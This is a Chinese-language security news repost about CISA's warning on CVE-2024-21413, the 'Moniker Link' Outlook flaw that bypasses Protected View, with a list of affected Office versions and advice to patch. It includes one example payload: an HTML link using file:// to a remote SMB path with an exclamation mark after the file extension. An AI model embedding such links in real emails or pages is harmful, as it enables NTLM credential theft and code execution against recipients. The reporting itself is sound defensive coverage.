本文擷取自資安人
美國網路安全暨基礎設施安全局(CISA)日前發出警告,提醒美國聯邦機構需立即採取行動,防範針對Microsoft Outlook一個嚴重遠端程式碼執行(RCE)漏洞的持續攻擊。
CVE-2024-21413漏洞由Check Point發現,源於Outlook在開啟含有惡意連結的電子郵件時,存在輸入驗證不當的問題。攻擊者可繞過Office檔案的Protected View保護機制(原應將可疑文件限制在唯讀模式),使惡意Office檔案直接在編輯模式下開啟,進而實現遠端程式碼執行。
Check Point將這個漏洞命名為「Moniker Link」,解釋攻擊者可透過在電子郵件中嵌入使用file://協議的惡意連結,並在URL中的檔案副檔名後加入驚嘆號,來繞過Outlook的內建保護機制。
範例如下:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
受影響的產品包括:
- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019
資安專家提醒,雖然CISA的警告主要針對美國聯邦機構,但建議私人企業也應優先修補此漏洞,以防止潛在的攻擊。成功利用此漏洞可能導致NTLM憑證遭竊取,以及透過精心製作的Office文件執行任意程式碼。
值得注意的是,Microsoft在修補說明中特別提到,即使僅是在預覽窗格中查看惡意Office文件,也可能觸發攻擊,因此使用者務必及時更新系統。
本文轉載自 bleepingcomputer。